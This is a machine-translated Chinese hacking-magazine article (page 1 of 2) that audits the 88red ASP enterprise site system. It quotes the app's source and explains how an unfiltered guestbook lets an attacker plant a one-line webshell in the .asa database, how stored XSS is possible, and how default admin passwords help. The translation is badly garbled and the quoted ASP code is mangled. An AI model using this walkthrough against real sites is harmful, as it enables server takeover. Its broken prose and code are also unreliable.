Author: Xiao Handsome (xsser) @[0.s.t]
This article has been published in the "Hacker Handbook" 4th, reproduced please indicate the source, or by hyperlinks to indicate: Http://blog.0kee.com/xiaoshuai small handsome ' s blog
For a long time did not go to asp300 stroll, do not always feel sorry this release station traffic, also sorry Hacker handbook so many readers of the strong request (don't throw eggs!) Throw the money! Well, since the cows are blown up, I have to risk my life to look at the code, anyway, I downloaded the time to feel great, this system is great, he blew the bigger than me, good, Let's see what he said: 88red generate HTM static page Enterprise Construction Station system V3.0 after careful to create a formal launch, a collection of site map, corporate news Center, Enterprise products, search, customer message, download, voting system and so on, basically covers an enterprise website needs basic functions. Its generation of static page function for the vast number of corporate Web site optimization search engine SEO, providing the greatest help. System designed a new art, more close to the results of corporate web site. We speak with facts. 1, unfiltered message version opened the directory found conn.asp, config.asp and other documents, then look at it, first look at config.asp nothing special, conn.asp fault tolerance (is to prevent Bauku), no? Of course, let's take a look at the conn.asp:
<% On Error Resume Next Dim conn Dim connstr Dim db Db= "Data/qiyedata.asa" Set conn = Server.CreateObject ("ADODB". Connection ") connstr=" Provider=Microsoft.Jet.OLEDB.4.0;Data source= "& Server.MapPath (DB) Conn. Open connstr%>
Shun Rattan touch ... Touch it, touch what is what, I feel the database, or ASA, I first thought of a sentence this thing, a word? What can be connected with a word? How do I get him to go into storage? Users, messages, publishing and other places, I looked at the root directory is static, think of HTML injection line? I put the idea first, to see the message, the message is static, alas! All right, go on. The root directory has a file called savegb.asp, think also know is to save the message file, then see his filter, the fragment is as follows:
If Request.Form ("code") = "Then ' verification code is empty on the" Response.Write "<script language=javascript>alert (' Please fill in your name '); This.location.href= ' Javascript:history.go ( -1) ';</script> ' Response.endend ifif request.form ("content") = "" Then ' you do not write message content will deprive you of the right to speak Response.Write "<script language=javascript>alert (' Please fill in the message content '); this.location.href= ' Javascript:history.go ( -1) ';</script> ' Response.endend ifset rs=server.createobject ("Adodb.recordset") ' Meet the above 2 requirements to get you to see the database sql= "SELECT * from GB" Rs.Open sql,conn,3,3
Alas! The header of the file is also a conn.asp nothing to prevent or filter, resulting in 2 results: 1th, directly write a sentence to get the shell. 2nd, cross-station script attack! First of all, to write a sentence (the premise database does not interfere), as shown in Figure 1
) this.width=500; " >
Then we click "Submit" so that our word is entered into the ASA database. I am a small cyclone, ASA format file is not resolved, so I replaced ASP, but the principle is the same, we look at Figure 2
) this.width=500; " >
In this way we succeeded in inserting a sentence into the database, and then the right to raise something. 2nd, we look at XSS, by XSS we must immediately think there is no way to get webshell, such as using the Administrator's session to operate what, Cross Station to get Webshell, a cow wrote, we look backstage bar, backstage verification of the line, at least our master key no longer omnipotent. The fragments are as follows:
Theadmin=replace (Request ("User"), "'", "") ' filters out spaces and converts single quotes to spaces Pass=replace (Trim (Request ("Pass"), "'", "") " And the same filter as above. Set rs=server.createobject ("Adodb.recordset") sql= "select * from Admin Where admname= '" &theadmin "" Then enter the database operation Rs.Open sql,conn,1,3if rs.eof thenresponse.write "<script language= ' JavaScript ' >alert (' Sorry, this user does not exist! '); window.location.href= ' login.asp ';</script> ' Response.endelsepass1=rs ("Admpass") If Pass1=Md5 (pass) Thensession ("admin") =rs ("Admname") Response.Redirect "main.asp" Elseresponse.write "<script language=" JavaScript ' >alert (' Sorry, bad password! '); window.location.href= ' login.asp ';</script> ' End IfEnd Ifrs.closeset rs=nothingconn.closeset Conn=Nothing
End If
No, the single quote filter is choking us into one of the backstage ways. Continue to look at the code, thinking now tidy up, convenient for everyone to understand it. Message Filter LAX---à---àxss---à background verification is very good, unable to enter the-à to find the file header view of the configuration file. 2, the use of loopholes 1 shun rattan touch Webshell We use the default password to see Backstage, what White box black box test together, measured to Webshell is good tester, oh, nonsense does not continue, careful editor deduction tips, we look at Figure 3
) this.width=500; " >
Current 1/2 page
12 Next read the full text
